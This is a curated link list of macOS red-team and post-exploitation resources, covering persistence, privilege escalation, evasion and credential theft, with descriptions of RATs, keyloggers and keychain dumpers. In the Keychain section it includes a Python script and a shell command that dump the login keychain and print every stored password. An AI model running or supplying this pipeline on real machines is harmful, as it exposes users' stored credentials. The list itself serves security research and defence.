- How Offensive Actors Use AppleScript for Attacking macOS - Phil Stokes(2020)
- macOS Red Team: Spoofing Privileged Helpers (and Others) to Gain Root - Phil Stokes
- macOS Red Team: Calling Apple APIs Without Building Binaries - Phil Stokes
- Launch Scripts from Webpage Links - macosxautomation.com
- Using NSAppleScript - appscript.sourceforge
- hello, applescript 2: user in, user out - philastokes(applehelpwriter.com 2018)
- hello, applescript 3: (don’t?) tell me to run - philastokes(applehelpwriter 2018)
-
Tools
-
Orchard
- Live off the land for macOS. This program allows users to do Active Directory enumeration via macOS JXA (JavaScript for Automation) code. This is the newest version of AppleScript, and thus has very poor documentation on the web.
-
Javascript for Automation(JXA)
-
Talks/Presentations/Videos
-
Bash-ing Brittle Indicators: Red Teaming macOS without Bash or Python - Cody Thomas(Objective by the Sea v2.0)
- Slides
- In this talk, I'll go into the research, development, and usage of a new kind of agent based on JavaScript for Automation (JXA) and how it can be used in modern red teaming operations. This agent is incorporated into a broader open source project designed for collaborative red teaming I created called Apfell. I will discuss TTPs for doing reconnaissance, persistence, injection, and some keylogging all without using a shell command or spawning another scripting language. I will go into details of how JXA can be used to create an agent complete with encrypted key exchange for secure communications, domain fronting C2, and modular design to load or change key functionality on the fly. I will also cover the defensive considerations of these TTPs and how Apple is starting to secure these capabilities going forward.
-
Objective-C
- Articles/Blogposts/Writeups
-
Swift
- Articles/Blogposts/Writeups
-
Tools
-
ShellOut
- Easily run shell commands from a Swift script or command line tool
-
In-Memory Execution
- Articles/Blogposts/Writeups
-
Tools
-
macos_execute_from_memory
- PoC of macho loading from memory
-
Office Macros
- Articles/Blogposts/Writeups
- Running JXA Payloads from macOS Office Macros - Cedric Owens(2020)
-
Talks/Presentations/Videos
-
Office Drama on macOS - Patrick Wardle(DefconSafemode2020)
- On the Windows platform, macro-based Office attacks are well understood (and frankly are rather old news). However on macOS, though such attacks are growing in popularity and are quite en vogue, they have received far less attention from the research and security community. In this talk, we will begin by analyzing recent documents that contain macro-based attacks targeting Apple's desktop OS, highlighting the macOS-specific exploit code and payloads. Though sophisticated APT groups are behind several of these attacks, (luckily) these malicious documents and their payloads are constrained by recent application and OS-level security mechanisms. However, things could be far worse! To illustrate this claim, we'll detail the creation of a powerful exploit chain, that begins with CVE-2019-1457, leveraged a new sandbox escape and ended with a full bypass of Apple's stringent notarization requirements. Triggered by simply opening a malicious (macro-laced) Office document, no other user interaction was required in order to persistently infect even a fully-patched macOS Catalina system! To end the talk, we'll discuss various prevention and detection mechanisms that could thwart each stage of the exploit chain, as well as that aim to generically provide protection against future attacks!
-
URL Handlers
- Articles/Blogposts/Writeups
-
User Execution
-
Malicious Link
- Articles/Blogposts/Writeups
-
Malicious File
- Articles/Blogposts/Writeups
-
Tools
-
HappyMac
- A Python Mac app to suspend background processes
-
Platypus
- Platypus is a developer tool that creates native Mac applications from command line scripts such as shell scripts or Python, Perl, Ruby, Tcl, JavaScript and PHP programs. This is done by wrapping the script in an application bundle along with a slim app binary that runs the script.
-
Tools
-
Mouse
- Mouse Framework is an iOS and macOS post-exploitation framework that gives you a command line session with extra functionality between you and a target machine using only a simple Mouse Payload. Mouse gives you the power and convenience of uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, escalating privileges, password retrieval, and much more.
-
Apfell
- A collaborative, multi-platform, red teaming framework
- MacShell Post Exploitation Tool - Cedric Owens
-
MacShell
- MacShell is a macOS post exploitation tool written in python using encrypted sockets. I wrote this tool as a way for defenders and offensive security researchers to more easily understand the inner workings of python-based post exploitation tools on macOS.
-
MacShellSwift
- MacShellSwift is a proof of concept MacOS post exploitation tool written in Swift using encrypted sockets. I rewrote a prior tool of mine MacShell (one of my repos) and changed the client to Swift instead of python. This tool consists of two parts: a server script and a client binary. I wrote this tool to help blue teamers proactively gauge detections against macOS post exploitation methods that use macOS internal calls. Red teams can also find this of use for getting ideas around using Swift for macOS post exploitation.
-
Parasite
- Parasite is a powerful code insertion platform for OS X. It enables developers to easily create extensions which change the original behavior of functions. For users Parasite provides an easy way to install these extensions and tweak their OS.
-
EvilOSX
- A pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX.
-
Persistence
- General
-
Presentations/Talks/Videos
-
Userland Persistence On Mac Os X "It Just Works" - Shmoocon 2015
- Got root on OSX? Do you want to persist between reboots and have access whenever you need it? You do not need plists, new binaries, scripts, or other easily noticeable techniques. Kext programming and kernel patching can be troublesome! Leverage already running daemon processes to guarantee your access. As the presentation will show, if given userland administrative access (read: root), how easy it is to persist between reboots without plists, non-native binaries, scripting, and kexts or kernel patching using the Backdoor Factory.
- Boot or Logon Initialization Scripts
- Compromise Client Software Binary
- Folder Actions
- Xcode
-
Tools
-
p0st-ex
- Post-exploitation scripts for OS X persistence and privesc
-
iMessagesBackdoor
- A script to help set up an event handler in order to install a persistent backdoor that can be activated by sending a message.
-
Privilege Escalation
-
General
-
Articles/Blogposts/Writeups
-
Hidden backdoor API to root privileges in Apple OS X
- The Admin framework in Apple OS X contains a hidden backdoor API to root privileges. It’s been there for several years (at least since 2011), I found it in October 2014 and it can be exploited to escalate privileges to root from any user account in the system. The intention was probably to serve the “System Preferences” app and systemsetup (command-line tool), but any user process can use the same functionality. Apple has now released OS X 10.10.3 where the issue is resolved. OS X 10.9.x and older remain vulnerable, since Apple decided not to patch these versions. We recommend that all users upgrade to 10.10.3.
- Works on 10.7 -> 10.10.2
-
Presentations/Talks/Videos
-
Hacking Exposed: Hacking Macs - RSA Keynote, George Kurtz and Dmitri Alperovitch, Part 1 "Delivery"(2019)
- CrowdStrike Co-founders, CEO George Kurtz and CTO Dmitri Alperovitch, and Falcon OverWatch Senior Engineer Jaron Bradley demonstrate a “Delivery” stage attack against a MacOS system. This demo is from their RSA 2019 keynote address titled, “Hacking Exposed: Hacking Macs.”
-
Hacking Macs from RSA- George Kurtz and Dmitri Alperovitch, Part 2 "Privilege Escalation"
- CrowdStrike Co-founders, CEO George Kurtz and CTO Dmitri Alperovitch, and Falcon OverWatch Senior Engineer Jaron Bradley demonstrate a “Privilege Escalation” stage attack against a MacOS system. This demo is from their RSA 2019 keynote address titled, “Hacking Exposed: Hacking Macs.”
-
OSX XPC Revisited - 3rd Party Application Flaws - Tyler Bohan(OffensiveCon2020)
- XPC or cross process communication is a way for OSX and iOS processes to communicate with one another and share information. One use for this is to elevate privileges using a daemon who listens as a XPC service. While Apple has released a coding guideline it is all too often ignored or incorrectly implemented in third-party applications. One striking example of this is the Privileged Helper Tool. In this talk I am going to dive into what a Privileged Helper Tool is and why you should care about it. I will show the viewers how to locate these on an OSX computer and walk through the reverse engineering steps needed to identify if the service is vulnerable. We will then set up communications via Objective-C to deliver a privilege escalation attack. I will be showcasing twenty plus vulnerabilities in at least five products. All tooling and code will be released with the talk!
-
Dylib Hijacking
-
Articles/Blogposts/Writeups
-
DylibHijack
- python utilities related to dylib hijacking on OS X
-
Talks/Presentations/Videos
-
Gaining Root with Harmless AppStore Apps - Csaba Fitzi
- Slides
- This talk is about my journey from trying to find a dylib hijacking vulnerability in a particular application to finding a privilege escalation vulnerability in macOS. During the talk I will try to show the research process, how I moved from one finding to the next, and I will also show many of the failures / dead ends I had during the exploit development. First I will briefly cover what dylib hijacking is, and what the current state of various applications is regarding this type of vulnerability. We will see how hard it is to exploit these in many cases due to the fact that root access is required. Second I will cover two seemingly harmless bugs affecting the installation process of AppStore apps, and we will see how we can chain these together in order to gain root privileges - for this we will utilise a completely benign app from the macOS App Store. As part of this I will cover how we can submit apps to the store, and what the difficulties are with that process. In the last part I will cover how we can infect and include our malicious file in an App installer without breaking the App’s signature.
-
Automated Dylib Hijacking - Jimi Sebree(Derbycon2019)
- Applications on macOS use a common and flawed method of loading dynamic libraries (dylib), which leaves them vulnerable to a post-exploitation technique known as dylib hijacking. Dylib hijacking is a technique used to exploit this flawed loading method in order to achieve privilege escalation, persistence, or the ability to run arbitrary code. This talk provides an overview of the attack vector and the process involved in exploiting vulnerable applications. Additionally, the process of automating the exploitation of vulnerable applications will be demonstrated and discussed in depth. The tools developed and used for this demonstration will be made publicly available.
-
Tools
-
boko
- boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables, as well as scripts an application may use that have the potential to be backdoored. The tool also calls out interesting files and lists them instead of manually browsing the file system for analysis. With the active discovery function, there's no more guess work if an executable is vulnerable to dylib hijacking!
- Elevated Execution with Prompt
- Emond
-
Exploitation for Privilege Escalation
- CVE-2019-8805 - A macOS Catalina privilege escalation - Scott Knight
-
Sniffing Authentication References on macOS - Patrick Wardle(2018)
- details of a privilege-escalation vulnerability (CVE-2017-7170)
-
The Ugly: for last ~13 years (OSX 10.4+) anybody could locally sniff 'auth tokens' then replay to stealthy & reliably elevate to r00t 🍎🤒☠️ The Bad: reported to Apple -they silently patched it (10.13.1) 🤬 The Good: when confronted they finally assigned CVE + updated docs 😋
- Mac OS X local privilege escalation (IOBluetoothFamily)
- How to gain root with CVE-2018-4193 in < 10s - Eloi Benoist-Vanderbeken
-
CVE-2018-4193
- exploit for CVE-2018-4193
-
Rootpipe
-
Rootpipe Reborn (Part I) - codecolorist
- CVE-2019-8513 TimeMachine root command injection
-
Rootpipe Reborn (Part II) - codecolorist
- CVE-2019-8565 Feedback Assistant race condition leads to root LPE
- Stick That In Your (root)Pipe & Smoke It - Patrick Wardle(Defcon23)
- Launch Daemon
-
Permissions Misconfiguration
-
Articles/Blogposts/Writeups
-
Exploiting directory permissions on macOS - theevilbit
- In the following post I will first go over the permission model of the macOS filesystem, with focus on the POSIX part, discuss some of the non trivial cases it can produce, and also give a brief overview how it is extended. I won’t cover every single detail of the permission model, as it would be a topic in itself, but rather what I found interesting from the exploitation perspective. Then I will cover how to find these bugs, and finally I will go through in detail all of the bugs I found. Some of these are very interesting as we will see, as exploitation of them involves “writing” to files owned by root, while we are not root, which is not trivial, and can be very tricky.
-
Talks/Presentations/Videos
-
Root Canal - Samuel Keeley(OBTSv2.0)
- Slides
- Apple released System Integrity Protection/rootless with OS X El Capitan almost four years ago. The root account is still there, and many common pieces of software open the Mac up to simple root escalations - including common macOS management tools. How can we detect these vulnerabilities across our Mac fleets? What can root still be abused for in 2019?
- Plist Modification
-
Privileged File Operations
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
-
Process Injection
-
Articles/Blogposts/Writeups
-
Privilege Escalation on OS X below 10.0
- CVE-2014-8835
-
Tools
-
osxinj
- Another dylib injector. Uses a bootstrapping module since mach_inject doesn't fully emulate library loading and crashes when loading complex modules.
- Setuid and Setgid
- Startup Items
- Sudo
- Sudo Caching
- Valid Accounts
- Web Shell
- SIP Bypass
-
Exploits
-
Why <blank> Gets You Root - Patrick Wardle(2017)
- In case you haven't heard the news, there is a massive security flaw which affects the latest version of macOS (High Sierra). The bug allows anybody to log into the root account with a blank password, or a password of their choosing. Yikes!
-
macOS 10.13.x SIP bypass (kernel privilege escalation)
- "Works only on High Sierra, and requires root privilege. It can be chained with my previous local root exploits."
- Slides
-
IOHIDeous(2017)
- Code
- A macOS kernel exploit based on an IOHIDFamily 0day.
-
Issue 1102196: Security: Keystone for macOS should use auditToken to validate incoming XPC message - Project0
- PrivEsc through Chrome installer.
-
Talks/Presentations/Videos
- Death By 1000 Installers on macOS and it's all broken! - Patrick Wardle(Defcon25)
-
Attacking OSX for fun and profit: tool set limitations, frustration and table flipping - Dan Tentler - ShowMeCon
- 'I was approached by Fusion to be part of their 'Real Future' documentary - specifically, and I quote, to 'see how badly I could fuck his life up, while having control of his laptop'. They wanted me to approach this scenario from how a typical attacker wou'
-
Tools
-
BigPhish
- This issue has been resolved by Apple in MacOS Sierra by enabling tty_tickets by default. NOTE: All other MacOS operating systems (El Capitan, Yosemite, Mavericks etc...) still remain vulnerable to this exploit.
-
Defense Evasion
- 101
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
Bypassing MacOS Detections With Swift - Cedric Owens(Derbycon2019)
- This talk is centered around red teaming in MacOS environments. Traditionally, MacOS post exploitation has largely been done in python with a heavy reliance on command line utilities. However, as defender tradecraft continues to evolve with detecting suspicious python usage on MacOS, we (as red teamers) should consider migrating to different post exploitation methods. In this talk, I will share why the Swift language can be beneficial for red teaming macOS environments. I will also share some macOS post exploitation code I have written using the Swift programming language and contrast detection techniques between python and Swift based post exploitation.
-
Tools
-
appencryptor
- A command-line tool to apply or remove Apple Binary Protection from an application.
- Application Whitelisting
-
Endpoint Security
-
101
-
EndpointSecurity - developer.apple
- Endpoint Security is a C API for monitoring system events for potentially malicious activity. Your client, which you can write in any language supporting native calls, registers with Endpoint Security to authorize pending events, or receive notifications of events that have already occurred. These events include process executions, mounting file systems, forking processes, and raising signals. Develop your system extension with Endpoint Security and package it in an app that uses the SystemExtensions framework to install and upgrade the extension on the user’s Mac.
- Articles/Blogposts/Writeups
-
Gatekeeper
-
101
- Gatekeeper - Wikipedia
- Gatekeeper Bypass - ATT&CK
-
Safely open apps on your Mac - support.apple
- 'macOS includes a technology called Gatekeeper, that's designed to ensure that only trusted software runs on your Mac.'
-
- Launch Service Keys - LSFileQuarantineEnabled
- macOS Code Signing In Depth - developer.apple
- Articles/Blogposts/Writeups
-
System Integrity Protection(SIP)
- 101
-
Articles/Blogposts/Writeups
-
Bypassing Apple's System Integrity Protection - Patrick Wardle
- abusing the local upgrade process to bypass SIP
-
Talks/Presentations/Videos
-
Bad Things in Small Packages - Jaron Bradley
- Slides
- This talk will primarily focus on the work that went into discovering CVE-2019-8561. The vulnerability exists within PackageKit that could lead to privilege escalation, signature bypassing, and ultimately the bypassing of Apple's System Integrity Protection (SIP). This vulnerability was patched in macOS 10.14.4, but the details behind this exploit have not been documented anywhere prior to this conference!
-
XProtect
- 101
-
Articles/Blogposts/Writeups
- How To Bypass XProtect on Catalina - Phil Stokes
-
XProtect
- This repo contains historical releases of the XProtect configuration data.
-
Credential Access
-
Cracking Password Hashes
-
Articles/Blogposts/Writeups
- How to extract hashes and crack Mac OS X Passwords - onlinehashcrack.com
- How to Hack a Mac Password Without Changing It - Tokyoneon
- Mac OSX Password Cracking - mcontino(2017)
-
What type of hash are a Mac's password stored in? - AskDifferent
- Check the first answer
- Cracking Mac OS Lion Passwords - frameloss.org(2011)
-
Tools
-
DaveGrohl 3.01 alpha
- A Password Cracker for OS X
-
Bash History
- Articles/Blogposts/Writeups
-
Brute Force
- Articles/Blogposts/Writeups
- Tools
-
Credential Dumping
-
Articles/Blogposts/Writeups
-
Getting What You’re Entitled To: A Journey Into MacOS Stored Credentials - MDSec(2020)
- In this blog post we will explore how an operator can gain access to credentials stored within MacOS third party apps by abusing surrogate applications for code injection, including a case study of Microsoft Remote Desktop and Google Drive.
- Bypassing MacOS Privacy Controls - Adam Chester(2020)
- Talks/Presentations/Videos
- Tools
-
Credentials from Web Browsers
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Tools
-
Credentials in Files
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Tools
-
Exploitation for Credential Access
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Tools
-
Input Capture
- Articles/Blogposts/Writeups
- In this post, we’re going to take a quick look at Frida and use it to steal credentials from KeePass.
- Talks/Presentations/Videos
-
Tools
-
kcap
- This program simply uses screen captures and programmatically generated key and mouse events to locally and graphically man-in-the-middle an OS X password prompt to escalate privileges.
-
Input Prompt
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
-
Tools
- Empire prompt.py
-
FiveOnceinYourlife
- Local osx dialog box phishing using osascript. Easier than keylogging on osx. Simply ask for the passwords you want.
-
Keychain
-
Articles/Blogposts/Writeups
- Keychain Services - developer.apple.com
-
Security Flaw in OS X displays all keychain passwords in plain text - Brenton Henry(2016)
- There is a method in OS X that will allow any user to export your keychain, without sudo privileges or any system dialogs, to a text file, with the username and passwords displayed in plain text. As of this writing(2016), this method works in at least 10.10 and 10.11.5, and presumably at the least all iterations in between.
- Stealing macOS apps' Keychain entries - Wojciech Reguła(2020)
-
Talks/Presentations/Videos
-
OBTS v2.0 "KeySteal: A Vulnerability in Apple's Keychain" (Linus Henze)
- Slides
- What do your iCloud, Slack, MS Office, etc. credentials have in common? Correct, they're all stored inside your Mac's Keychain. While the Keychain is great because it prevents all those annoying password prompts from disturbing you, the ultimate question is: Is it really safe? Does it prevent malicious Apps from stealing all my passwords? In this talk I will try to answer those questions, showing you how the Keychain works and how it can be exploited by showing you the full details of my KeySteal exploit for the first time. The complete exploit code will be available online after the talk.
-
Tools
-
Mac OS X Keychain Forensic Tool
- The chainbreaker can extract user credentials from a Keychain file with the Master Key or user password in a forensically sound manner. Master Key candidates can be extracted from the volafox or volatility keychaindump module. Supports: Snow Leopard, Lion, Mountain Lion, Mavericks, Yosemite, El Capitan, (High) Sierra. This branch contains a quick patch for chainbreaker to dump non-exportable keys on High Sierra, see README-keydump.txt for more details.
-
KeySteal
- KeySteal is a macOS <= 10.14.3 Keychain exploit that allows you to access passwords inside the Keychain without a user prompt. The vulnerability has been assigned CVE-2019-8526.
-
OSX Key Chain Dumper
- 'Scripts to dump the values out of OSX Keychain. Tested on OS X El Capitan ver 10.11.6'
-
keychaindump(2015)
- Keychaindump is a proof-of-concept tool for reading OS X keychain passwords as root. It hunts for unlocked keychain master keys located in the memory space of the securityd process, and uses them to decrypt keychain files.
-
osx-hash-dumper
- Bash script to dump OSX user hashes in crackable format. Author: Cedric Owens
- retrieve-osxhash.py
- Chainbreaker2 - Luke Gaddie
-
Mac OS X Keychain Forensic Tool
-
Articles/Blogposts/Writeups
-
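Worked example, added here and not taken from any of the tools listed above: a parser for the text that `security dump-keychain -d <keychain>` writes, which is the export the 2016 writeup at the top of this section describes. It pulls the service, account and decrypted secret out of each record. The sample dump it runs on is constructed (paths, accounts and secrets are made up; the attribute names `svce`, `srvr`, `acct` and the `data:` block are the ones the `security` tool prints), and the script name in the usage note is hypothetical. One operational caveat: on current macOS versions, `-d` raises a Keychain Access prompt for every item whose ACL does not already include the calling tool, so an export that prompts dozens of times is what a user actually sees.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample in the layout `security dump-keychain -d <keychain>` prints: one
# `keychain:` record per item, attributes as "name"<type>=value, and the decrypted secret
# on the line after `data:`.  Every path, account, service and secret below is made up.
# The third record has no data section, as in a dump taken without -d.
SAMPLE_DUMP = r'''keychain: "/Users/alice/Library/Keychains/login.keychain-db"
version: 512
class: "genp"
attributes:
    0x00000007 <blob>="corp-vpn"
    0x00000008 <blob>=<NULL>
    "acct"<blob>="alice"
    "cdat"<timedate>=0x32303230303130313030303030305A00  "20200101000000Z\000"
    "desc"<blob>=<NULL>
    "svce"<blob>="corp-vpn"
data:
"hunter2"
keychain: "/Users/alice/Library/Keychains/login.keychain-db"
version: 512
class: "inet"
attributes:
    0x00000007 <blob>="git.example.internal"
    "acct"<blob>="alice@example.internal"
    "ptcl"<uint32>="htps"
    "srvr"<blob>="git.example.internal"
data:
0x746F6B656E2D30303131  "token-0011"
keychain: "/Users/alice/Library/Keychains/login.keychain-db"
version: 512
class: "genp"
attributes:
    "acct"<blob>="bob"
    "svce"<blob>="shared-printer"
'''


@dataclass
class KeychainItem:
    item_class: str           # "genp" = generic password, "inet" = internet password
    service: Optional[str]    # "svce" attribute for genp, "srvr" for inet
    account: Optional[str]    # "acct" attribute
    secret: Optional[bytes]   # None when the dump carries no data section for the item


ATTR_RE = re.compile(r'^\s*"(\w{4})"<\w+>=(.*)$')
QUOTED_RE = re.compile(r'^"(.*)"$')


def _unquote(value: str) -> Optional[str]:
    value = value.strip()
    if value == "<NULL>":
        return None
    m = QUOTED_RE.match(value)
    return m.group(1) if m else value


def _decode_secret(line: str) -> bytes:
    # Printable secrets are printed as a quoted string; others as hex followed by a quoted rendering.
    if line.startswith("0x"):
        return bytes.fromhex(line.split()[0][2:])
    m = QUOTED_RE.match(line.strip())
    return (m.group(1) if m else line).encode()


def _finish(record: dict) -> KeychainItem:
    attrs = record["attrs"]
    service = attrs.get("svce") if record["class"] == "genp" else attrs.get("srvr")
    return KeychainItem(record["class"], service, attrs.get("acct"), record["secret"])


def parse_dump(text: str) -> List[KeychainItem]:
    """Turn a dump-keychain text export into one KeychainItem per `keychain:` record."""
    items: List[KeychainItem] = []
    record = None
    secret_next = False
    for line in text.splitlines():
        if line.startswith("keychain:"):          # start of the next item
            if record is not None:
                items.append(_finish(record))
            record = {"class": "", "attrs": {}, "secret": None}
            secret_next = False
            continue
        if record is None:
            continue
        if secret_next:                           # the line after `data:` is the secret itself
            record["secret"] = _decode_secret(line)
            secret_next = False
        elif line.startswith("class:"):
            record["class"] = _unquote(line.split(":", 1)[1]) or ""
        elif line.startswith("data:"):
            secret_next = True
        else:
            m = ATTR_RE.match(line)
            if m:
                record["attrs"][m.group(1)] = _unquote(m.group(2))
    if record is not None:
        items.append(_finish(record))
    return items


def credentials(items: List[KeychainItem]) -> List[Tuple[str, str, str]]:
    """(service, account, secret) for every item whose secret the dump actually contained."""
    return [(i.service or "", i.account or "", i.secret.decode("utf-8", "replace"))
            for i in items if i.secret is not None]


if __name__ == "__main__":
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_DUMP
    for service, account, secret in credentials(parse_dump(text)):
        print(f"{service}\t{account}\t{secret}")
```

Usage (script name is hypothetical): `security dump-keychain -d ~/Library/Keychains/login.keychain-db 2>/dev/null | python3 parse_keychain_dump.py`; on 10.11 and earlier the file is `login.keychain` rather than `login.keychain-db`. Run with no input it parses the built-in sample.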
Network Sniffing
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Tools
Private Keys
- Articles/Blogposts/Writeups
Securityd Memory
- Articles/Blogposts/Writeups
- Tools
Steal Web Session Cookie
- Articles/Blogposts/Writeups
- Tools
Two-Factor Authentication Interception
- Articles/Blogposts/Writeups
- Tools
Cracking Password Hashes
Discovery
- General/Unsorted
  - Mac Quarantine Event Database - menial.co.uk(2011)
    - After all the fuss surrounding the iPhone location log, you may be interested to know that there is a file on Macs running Snow Leopard or higher that keeps a record of files you've downloaded. This record is not purged when you clear Safari downloads, caches or even reset Safari completely.
- Process Discovery
  - Articles/Blogposts/Writeups
  - Tools
    - Kemon
      - An Open-Source Pre and Post Callback-Based Framework for macOS Kernel Monitoring.
    - Sinter
      - Sinter is a 100% user-mode endpoint security agent for macOS 10.15 and above, written in Swift. Sinter uses the user-mode EndpointSecurity API to subscribe to and receive authorization callbacks from the macOS kernel, for a set of security-relevant event types. The current version of Sinter supports allowing/denying process executions; in future versions we intend to support other types of events such as file, socket, and kernel events.
- Remote System Discovery
  - Articles/Blogposts/Writeups
  - Tools
- Security Software Discovery
  - Articles/Blogposts/Writeups
  - Tools
    - AV_Enum_JXA
      - JXA code to enumerate security software on a macOS host
- Software Discovery
  - Articles/Blogposts/Writeups
  - Tools
- System Information Discovery
  - Articles/Blogposts/Writeups
  - Tools
    - SwiftBelt
      - SwiftBelt is a macOS enumerator inspired by @harmjoy's Windows-based Seatbelt enumeration tool. SwiftBelt does not utilize any command line utilities and instead uses Swift code (leveraging the Cocoa Framework, Foundation libraries, OSAKit libraries, etc.) to perform system enumeration. This can be leveraged on the offensive side to perform enumeration once you gain access to a macOS host. I intentionally did not include any functions that cause pop-ups (ex: keychain enumeration).
    - HealthInspector
      - JXA situational awareness helper by simply reading specific files on a filesystem
- Tools
  - forgetmenot
    - local looting script in python
  - APOLLO - Apple Pattern of Life Lazy Output'er
    - APOLLO stands for Apple Pattern of Life Lazy Output’er. I wanted to create this tool to be able to easily correlate multiple databases with hundreds of thousands of records into a timeline that would make the analyst (me, mostly) be able to tell what has happened on the device. iOS (and MacOS) have these absolutely fantastic databases that I’ve been using for years with my own personal collection of SQL queries to do what I need to get done. This is also a way for me to share my own research and queries with the community. Many of these queries have taken hours, even days to research and compile into something useful. My goal with this script is to put the analysis function in the SQL query itself. Each query will output a different part of the puzzle. The script itself just compiles the data into a CSV or SQLite database for viewing and filtering. While this database/spreadsheet can get very large, it is still more efficient than running queries on multiple databases and compiling the data into a timeline manually.
Lateral Movement
- AppleScript
  - Articles/Blogposts/Writeups
  - Tools
- Application Deployment Software
  - Articles/Blogposts/Writeups
  - Tools
- Exploitation of Remote Services
  - Articles/Blogposts/Writeups
  - Tools
- Internal Spearphishing
  - Articles/Blogposts/Writeups
  - Tools
- Logon Scripts
  - Articles/Blogposts/Writeups
  - Tools
- Remote File Copy
  - Articles/Blogposts/Writeups
  - Tools
- Remote Services
  - Articles/Blogposts/Writeups
  - Tools
- SSH Hijacking
  - Articles/Blogposts/Writeups
  - Tools
- Third-party Software
  - Articles/Blogposts/Writeups
  - Tools
Collection
- 101
- Articles/Blogposts/Writeups
- Audio Capture
- Automated Collection
- Browser-Data
  - Articles/Blogposts/Writeups
  - Tools
    - Chlonium
      - Chlonium is an application designed for cloning Chromium Cookies.
- Clipboard Data
- Data from Information Repositories
- Data from Local System
  - Articles/Blogposts/Writeups
  - Tools
    - PICT - Post-Infection Collection Toolkit
      - This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.
    - PICT-Swift (Post Infection Collection Toolkit)
      - This is a Swift (and slightly modified) version of Thomas Reed's PICT (Post Infection Collection Toolkit: https://github.com/thomasareed/pict). Thomas Reed is the brains behind the awesome PICT concept. I just simply wrote a Swift version of it and added an additional collector.
    - macOS-browserhist-parser
      - Swift code to parse the quarantine history database, Chrome history database, Safari history database, and Firefox history database on macOS.
- Data from Network Shared Drive
- Data from Removable Media
- Data Staged
- Input Capture
  - Articles/Blogposts/Writeups
  - Tools
    - SwiftSpy
      - macOS keylogger, clipboard monitor, and screenshotter written in Swift
    - Swift-Keylogger
      - Keylogger for mac written in Swift using HID
- Screen Capture
  - Articles/Blogposts/Writeups
  - Tools
- Video Capture
- MacOS Red Teaming Blogpost Series by Action Dan(2019)
  - MacOS Red Teaming 201: Introduction - Action Dan
  - MacOS Red Teaming 202: Profiles - Action Dan
  - MacOS Red Teaming 203: MDM (Mobile Device Management) - Action Dan
  - MacOS Red Teaming 204: Munki Business - Action Dan
  - MacOS Red Teaming 205: TCC (Transparency, Consent, and Control) - Action Dan
  - MacOS Red Teaming 206: ARD (Apple Remote Desktop Protocol) - Action Dan
  - MacOS Red Teaming 207: Remote Apple Events (RAE) - Action Dan
  - MacOS Red Teaming 208: macOS ATT&CK Techniques - Action Dan
  - MacOS Red Teaming 209: macOS Frameworks for Command and Control - Action Dan
  - MacOS Red Teaming 210: Abusing Pkgs for Privilege Escalation - Action Dan
  - MacOS Red Teaming 211: Dylib Hijacking - Action Dan
macOS Technologies
- Code Signing
- Endpoint Security Framework
  - EndpointSecurity - developer.apple
    - Endpoint Security is a C API for monitoring system events for potentially malicious activity. Your client, which you can write in any language supporting native calls, registers with Endpoint Security to authorize pending events, or receive notifications of events that have already occurred. These events include process executions, mounting file systems, forking processes, and raising signals. Develop your system extension with Endpoint Security and package it in an app that uses the SystemExtensions framework to install and upgrade the extension on the user’s Mac.
- GateKeeper
  - App security overview - support.apple
  - Protecting against malware - support.apple
  - Gatekeeper and runtime protection - support.apple
  - Gatekeeper - Wikipedia
    - 'macOS includes a technology called Gatekeeper, that's designed to ensure that only trusted software runs on your Mac.'
  - Safely open apps on your Mac - support.apple
- Mach-O Binaries
  - 101
- System Integrity Protection
- Transparency, Consent, and Control
- XProtect
Post-Exploitation Windows
- 101
- Unsorted
Living_off_The_Land
- 101
  - Living Off The Land: A Minimalist's Guide To Windows Post Exploitation - Christopher Campbell, Matthew Graeber(Derbycon3)
  - LOLBins - Living Off The Land Binaries & Scripts & Libraries
    - "Living off the land" was coined by Matt Graeber - @mattifestation <3
    - The term LOLBins came from a twitter discussion on what to call these binaries. It was first proposed by Philip Goh - @MathCasualty here: https://twitter.com/MathCasualty/status/969174982579273728
    - The term LOLScripts came from Jimmy - @bohops: https://twitter.com/bohops/status/984828803120881665
  - Installers – Interactive Lolbins - Hexacorn
  - WinBinDex - The Windows Binaries Index
- Articles/Blogposts/Writeups
  - Installers – Interactive Lolbins, Part 2 - Hexacorn
  - Bring your own lolbas? - Hexacorn
  - Reusigned Binaries - Hexacorn
  - Reusigned Binaries – Living off the signed land - Hexacorn
  - Hack Microsoft Using Microsoft Signed Binaries - Pierre-Alexandre Braeken
  - Microsoft Applications and Blocklist - FortyNorth Security
  - Unsanitized file validation leads to Malicious payload download via Office binaries. - Reegun J
  - Background Intelligent Transfer Protocol - TH Team
  - Stay positive Lolbins… not! - Hexacorn
  - Living Off the Land - liberty-shell
  - Living Off Windows Land – A New Native File “downldr” - Gal Kristal(2020)
  - Also Node.js has been used to perform a Living off the Land (LotL) attack - Andrea Fortuna(2019)
  - Upload and download small files with CertReq.exe - DTM(2020)
  - Staying Off the Land: A Threat Actor Methodology - Crowdstrike(2020)
  - Load/Inject malicious DLL using Microsoft Tools - safe(2018)
- Talks/Presentations/Videos
  - Living Off the Land: A Minimalist’s Guide to Windows Post-Exploitation - Christopher Campbell, Matthew Graeber(Derbycon2013)
    - Two of the biggest challenges of long-term penetration tests are advanced security products and active administrators. Host intrusion prevention, application white-listing and antivirus software are all looking for your tools. Administrators and network defenders are doing everything they can to find you. Surprisingly, the easiest way to hide from them and homestead in a Windows enterprise is to live off the land. Microsoft provides you with all the tools you need to get into a network and live there forever. Tools such as Wmic, Netsh and PowerShell are well-known to administrators, but they also provide an attacker a whole range of virtually untapped features. By simply leveraging PowerSploit and a few tricks you can reliably bypass antivirus, get around whitelisting, escalate privileges, redirect network traffic, take full packet captures, log keystrokes, take screenshots, dump hashes, persist and pivot to other hosts all without introducing a single binary!
